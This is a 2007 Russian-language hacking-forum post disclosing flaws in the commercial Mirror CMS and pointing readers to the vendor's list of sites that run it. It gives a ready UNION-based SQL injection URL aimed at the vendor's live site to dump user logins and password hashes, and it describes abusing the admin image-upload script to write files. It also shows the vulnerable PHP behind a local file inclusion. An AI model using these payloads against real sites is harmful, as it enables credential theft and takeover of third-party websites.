Mirror CMS bugs

Mirror CMS bugs

29.10.2007, 15:48

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

С нами: 10516826

Репутация: 3742

Отправить сообщение для blackybr с помощью AIM

Отправить сообщение для blackybr с помощью Yahoo

Mirror CMS bugs

by me)

коммерческая платная цмс, производитель
http://mirrorcms.ru

там же представлены все сайты на это цмс

Код:

$sSQL="SELECT ".$suffx."_page.title  from _page where  _page.id='".$_GET['doc']."'";

Цитата:

select usr_login,usr_password from usertable

Если установлен мод рерайт, то название модуля берем из названия первого каталога ..
Например офф сайт

http://mirrorcms.ru/news/36/

аналогично

http://mirrorcms.ru/?ip=news&doc=36

Код:

http://mirrorcms.ru/?ip=news&doc=-1+union+select+1,2,3,concat(usr_login,char(64),usr_password),5,6,7,8,9+from+usertable/*

md5()

проблема в том что админка при инстале указывается вручную, поэтому стандартно /admin/ встречается на 2-3 сайтах.

Вообще отпадает смысл в скуле, если мы находим админку.. тогда идем в

http://site.com/админка/template/imageload.php

вводим сверху диру где разрешена запись (у меня на 4х сайтах оказалась не просто ?image/ как по дэфолту.. а /stock/images/

и третья уязвиость - локальный инклуд при magic quotes off в index.php

PHP код:


		
			
if(file_exists("$ip/docn.php")){

include("$ip/docn.php"); }

𝕏 Twitter Reddit Telegram Копировать ссылку

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2